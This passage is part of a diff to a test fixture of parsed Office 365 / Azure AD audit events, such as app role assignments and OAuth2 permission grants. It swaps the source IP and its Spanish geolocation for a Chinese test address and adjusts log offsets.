"source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -13023,8 +12861,8 @@ }, { "@timestamp": "2020-02-11T16:45:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -13039,7 +12877,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 403386, + "log.offset": 403224, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -13068,9 +12906,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:37", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13155,20 +12993,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -13179,8 +13015,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -13195,7 +13031,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 407299, + "log.offset": 407135, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -13224,9 +13060,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -13318,20 +13154,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -13342,8 +13176,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -13358,7 +13192,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 412451, + "log.offset": 412285, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -13387,9 +13221,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13481,20 +13315,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -13505,8 +13337,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -13521,7 +13353,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 417603, + "log.offset": 417435, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -13550,9 +13382,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13644,20 +13476,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -13668,8 +13498,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -13684,7 +13514,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 422755, + "log.offset": 422585, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -13713,9 +13543,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -13807,20 +13637,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -13831,8 +13659,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -13847,7 +13675,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 427907, + "log.offset": 427735, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -13876,9 +13704,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13970,20 +13798,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -13994,8 +13820,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -14010,7 +13836,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 433059, + "log.offset": 432885, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -14039,9 +13865,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14133,20 +13959,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -14157,8 +13981,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -14173,7 +13997,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 438211, + "log.offset": 438035, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -14202,9 +14026,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -14296,20 +14120,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -14320,8 +14142,8 @@ }, { "@timestamp": "2020-02-11T16:45:41.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -14336,7 +14158,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 443363, + "log.offset": 443185, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -14365,9 +14187,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:41", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14459,20 +14281,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -14483,8 +14303,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add OAuth2PermissionGrant.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -14499,7 +14319,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 448515, + "log.offset": 448335, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -14528,9 +14348,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14622,20 +14442,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -14646,8 +14464,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add OAuth2PermissionGrant.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -14662,7 +14480,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 453904, + "log.offset": 453722, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -14691,9 +14509,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -14785,20 +14603,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -14809,8 +14625,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add OAuth2PermissionGrant.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -14825,7 +14641,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 459293, + "log.offset": 459109, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -14854,9 +14670,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14948,20 +14764,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -14972,8 +14786,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Consent to application.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -14988,7 +14802,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 464682, + "log.offset": 464496, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -15017,9 +14831,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15112,20 +14926,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
